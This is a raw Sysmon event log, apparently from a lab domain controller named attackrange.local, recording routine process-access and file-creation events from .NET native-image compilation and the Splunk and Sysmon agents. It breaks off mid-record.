13:49:46.839{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FA-6005-4E03-00000000A301}5036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.823{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FA-6005-4E03-00000000A301}5036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.823{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FA-6005-4E03-00000000A301}5036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 11241100x80000000000000007624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:46.760{59A5CD1D-91FA-6005-4D03-00000000A301}5116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13fc-0\Microsoft.GroupPolicy.Commands.dll2021-01-18 13:49:46.760 10341000x80000000000000007623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.604{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FA-6005-4D03-00000000A301}5116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.573{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FA-6005-4D03-00000000A301}5116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.573{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FA-6005-4D03-00000000A301}5116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.526{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FA-6005-4C03-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.526{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FA-6005-4C03-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.526{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FA-6005-4C03-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:46.495{59A5CD1D-91FA-6005-4B03-00000000A301}2964C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b94-0\Microsoft.GroupPolicy.ServerAdminTools.GpmgmtLib.dll2021-01-18 13:49:46.495 10341000x80000000000000007616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.401{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FA-6005-4B03-00000000A301}2964C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.401{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FA-6005-4B03-00000000A301}2964C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.401{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FA-6005-4B03-00000000A301}2964C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.370{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FA-6005-4A03-00000000A301}868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.354{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FA-6005-4A03-00000000A301}868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.354{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FA-6005-4A03-00000000A301}868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:46.339{59A5CD1D-91FA-6005-4903-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\9b4-0\Microsoft.GroupPolicy.Management.Interop.dll2021-01-18 13:49:46.339 10341000x80000000000000007609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.245{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FA-6005-4903-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.229{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FA-6005-4903-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.229{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FA-6005-4903-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.167{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FA-6005-4803-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.151{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FA-6005-4803-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.151{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FA-6005-4803-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:46.120{59A5CD1D-91F9-6005-4603-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11fc-0\Microsoft.GroupPolicy.Management.dll2021-01-18 13:49:46.120 10341000x80000000000000007602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.104{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91FA-6005-4703-00000000A301}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.104{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C